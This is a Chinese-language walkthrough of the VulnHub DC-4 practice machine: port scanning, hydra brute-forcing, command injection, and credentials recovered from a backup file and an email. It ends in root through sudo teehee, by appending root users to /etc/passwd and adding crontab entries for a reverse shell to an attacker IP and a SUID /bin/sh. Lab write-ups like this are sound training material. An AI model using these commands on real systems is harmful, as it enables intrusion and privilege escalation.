VulnHub——DC-4

DC-4

靶机链接
难度： beginners/intermediates

信息搜集

nmap -A -sV -p1-65535 -oN DC-4.txt 192.168.50.206

查看80端口，发现登陆界面，查看源码未发现任何有用信息。

漏洞挖掘与利用

使用cewl生成密码。

尝试使用hydra进行爆破。

hydra -L /share/username.txt -P /usr/share/wordlists/rockyou.txt 192.168.50.206 http-post-form "/login.php:username=^USER^&password=^PASS^:S=logout" -F

执行失败，尝试使用burp爆破模块进行爆破。

不知道为什么，全部成功了
登录一下试试


使用burp拦截数据包



发现空格使用+号进行替换，尝试修改数据包进行命令执行攻击。


使用pyhon获取交互式shell

python -c 'import pty;pty.spawn("/bin/sh")'

搜索文件后发现/home/jim/backups下存在old-password.bak
使用hydra进行爆破jim用户

jim:jibril04登陆后执行命令提示有新的邮件。

邮件说他要去度假，老板让他把密码给jim。

获取到用户名和密码
charles：^xHhA&hvim0y
su charles切换用户。
同样执行

find / -perm -u=s -type f 2>/dev/null

没有可以生成shell的可执行文件

使用sudo -l来查看用户的权限，发现有teehee命令是以root身份运行并不需要密码。

尝试运行teehee命令。

发现有用的参数：-a：追加内容到文件
使用命令创建个test用户权限为root。

sudo teehee -a /etc/passwd
anran::0:0:::/bin/bash

echo "administrator::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
administrator

一直验证失败

更换写入文件，往/etc/crontab里添加新的计划任务

echo "* * * * * root bash -i >& /dev/tcp/192.168.50.194/1234 0>&1" | sudo teehee -a /etc/crontab
需要在攻击方执行nc -lvvp 1234
echo "* * * * * root chmod 4777 /bin/sh" | sudo teehee -a /etc/crontab
等一分钟后执行/bin/dash

获取到权限后查看/etc/passwd文件检查为什么添加的用户无法登录
发现多了4行空行，应该是测试命令时写入的，删除后可以正常su提权到root权限了。